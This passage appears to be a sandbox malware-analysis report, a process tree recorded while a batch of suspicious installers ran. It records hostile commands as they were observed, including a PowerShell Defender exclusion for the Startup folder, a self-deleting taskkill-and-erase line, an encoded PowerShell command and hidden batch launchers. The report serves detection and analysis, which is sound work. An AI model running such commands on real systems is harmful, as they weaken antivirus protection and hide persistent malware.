  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
  2⤵
  - Loads dropped DLL
  PID:4424
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 600
    3⤵
    - Program crash
    PID:312

C:\Users\Admin\Desktop\New folder\HeInstaller\fb94349c162808651fb84b58e6881eb0.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\fb94349c162808651fb84b58e6881eb0.exe"
1⤵
PID:4696
- C:\Users\Admin\Desktop\New folder\HeInstaller\fb94349c162808651fb84b58e6881eb0.exe
  "C:\Users\Admin\Desktop\New folder\HeInstaller\fb94349c162808651fb84b58e6881eb0.exe"
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:3420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4424 -ip 4424
1⤵
PID:2128

C:\Users\Admin\Desktop\New folder\HeInstaller\EBZfayui1.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\EBZfayui1.exe"
1⤵
PID:3248
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:2284

C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2420
- C:\Users\Admin\AppData\Local\Temp\is-5L78B.tmp\is-8C8VF.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-5L78B.tmp\is-8C8VF.tmp" /SL4 $40326 "C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe" 1775056 52736
  2⤵
  PID:464
- - C:\Program Files (x86)\FJBsoftFR\FRec323\FRec323.exe
    "C:\Program Files (x86)\FJBsoftFR\FRec323\FRec323.exe"
    3⤵
    PID:776
  - - C:\Users\Admin\AppData\Roaming\{9e74baef-b191-11ed-b7c8-806e6f6e6963}\Bt8oAAf.exe
      4⤵
      Executes dropped EXE
      PID:5528
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "FRec323.exe" /f & erase "C:\Program Files (x86)\FJBsoftFR\FRec323\FRec323.exe" & exit
      4⤵
      PID:2248
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "FRec323.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:5564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2824 -ip 2824
1⤵
PID:5396

C:\Users\Admin\Desktop\New folder\HeInstaller\OlovWPF.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\OlovWPF.exe"
1⤵
PID:5508
- C:\Users\Public\olov.exe
  C:\Users\Public\olov.exe
  2⤵
  PID:5292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2824 -ip 2824
1⤵
PID:5792

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
PID:5868
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
  2⤵
  PID:6124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
    3⤵
    PID:4168

C:\Users\Admin\Desktop\New folder\HeInstaller\RFQ2.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\RFQ2.exe"
1⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
  2⤵
  PID:5004
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  2⤵
  PID:6052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2824 -ip 2824
1⤵
PID:6108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4104 -ip 4104
1⤵
PID:5232

C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:5376
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\animecool.exe
  2⤵
  PID:632
- - C:\Users\Admin\AppData\Local\Temp\animecool.exe
    C:\Users\Admin\AppData\Local\Temp\animecool.exe
    3⤵
    - Suspicious use of SetThreadContext
    PID:5812
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:3516
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
  2⤵
  PID:1120
- - C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
    C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
    3⤵
    - Suspicious use of SetThreadContext
    PID:3240
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1892
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      Drops startup file
      PID:4108
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sdfsfs3wefdsfsdfsd.bat" "
        5⤵
        
        PID:1120
      - C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
        
        nig1r21312312.exe exec hide nig1r21312312.exe exec hide cock123123444.bat
        6⤵
        
        PID:3136
        
        C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
        
        nig1r21312312.exe exec hide cock123123444.bat
        7⤵
        
        PID:4284
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cock123123444.bat
        8⤵
        
        PID:1264
        
        C:\Users\Admin\AppData\Local\Temp\MisakaMikoto213213.exe
        
        MisakaMikoto213213.exe
        9⤵
        Suspicious use of SetThreadContext
        
        PID:5488
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        10⤵
        
        PID:4972
        
        C:\Users\Admin\AppData\Local\Temp\cockcreator.exe
        
        cockcreator.exe
        9⤵
        
        PID:6176
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --allow-pre-commit-input --disable-background-networking --enable-features=NetworkServiceInProcess2 --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-breakpad --disable-client-side-phishing-detection --disable-dev-shm-usage --disable-features=Translate,BackForwardCache,AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync --disable-hang-monitor --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost --disable-renderer-backgrounding --disable-sync --force-color-profile=srgb --metrics-recording-only --no-first-run --enable-automation --password-store=basic --use-mock-keychain --enable-blink-features=IdleDetection --export-tagged-pdf --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-a5v2fn --headless --hide-scrollbars --mute-audio about:blank --disable-blink-features=AutomationControlled --remote-debugging-port=0
        10⤵
        
        PID:6204
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-a5v2fn /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-a5v2fn\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-a5v2fn --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffda4bc9758,0x7ffda4bc9768,0x7ffda4bc9778
        11⤵
        
        PID:6824
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-breakpad --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1384 --field-trial-handle=1552,i,11810274830778140524,784789091031446399,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:2
        11⤵
        
        PID:5308
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=3 --mojo-platform-channel-handle=2052 --field-trial-handle=1552,i,11810274830778140524,784789091031446399,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        11⤵
        
        PID:3652
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --disable-gpu-compositing --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2404 --field-trial-handle=1552,i,11810274830778140524,784789091031446399,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        11⤵
        
        PID:6168
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --headless --mojo-platform-channel-handle=3916 --field-trial-handle=1552,i,11810274830778140524,784789091031446399,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:8
        11⤵
        
        PID:7176
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --headless --mojo-platform-channel-handle=3796 --field-trial-handle=1552,i,11810274830778140524,784789091031446399,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:8
        11⤵
        Modifies registry class
        
        PID:7944
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --disable-gpu-compositing --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3680 --field-trial-handle=1552,i,11810274830778140524,784789091031446399,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        11⤵
        
        PID:6612
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
  2⤵
  PID:4972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
    3⤵
    PID:4336
  - - C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
      nig1r21312312.exe exec hide fds333333333333333.bat
      4⤵
      PID:5488
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c fds333333333333333.bat
        5⤵
        
        PID:6112
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 60
        6⤵
        Delays execution with timeout.exe
        
        PID:4172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2824 -ip 2824
1⤵
PID:5412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2184 -ip 2184
1⤵
PID:1372

C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe"
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2824 -ip 2824
1⤵
PID:4332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2824 -ip 2824
1⤵
PID:5556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffda4e446f8,0x7ffda4e44708,0x7ffda4e44718
  2⤵
  PID:5188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
  2⤵
  PID:1888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
  2⤵
  PID:2812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8
  2⤵
  PID:2960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:6044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
  2⤵
  PID:1368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
  2⤵
  PID:5784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
  2⤵
  PID:2756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
  2⤵
  PID:2244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1
  2⤵
  PID:3836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
  2⤵
  PID:1180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
  2⤵
  PID:5316
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  - Drops file in Program Files directory
  PID:5044
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x250,0x254,0x258,0x20c,0x25c,0x7ff6c7065460,0x7ff6c7065470,0x7ff6c7065480
    3⤵
    PID:4996
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
  2⤵
  PID:5404
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
  2⤵
  PID:4776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6120 /prefetch:8
  2⤵
  PID:5672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6028 /prefetch:8
  2⤵
  PID:5236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1380 /prefetch:2
  2⤵
  PID:5320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
  2⤵
  PID:3272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:4804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
  2⤵
  PID:5892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
  2⤵
  PID:4372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 /prefetch:8
  2⤵
  PID:4112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6636 /prefetch:1
  2⤵
  PID:1576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6604 /prefetch:1
  2⤵
  PID:4928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:1
  2⤵
  PID:1828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1117937578592303407,11906141063577331832,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
  2⤵
  - Executes dropped EXE
  - Maps connected drives based on registry
  PID:5128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
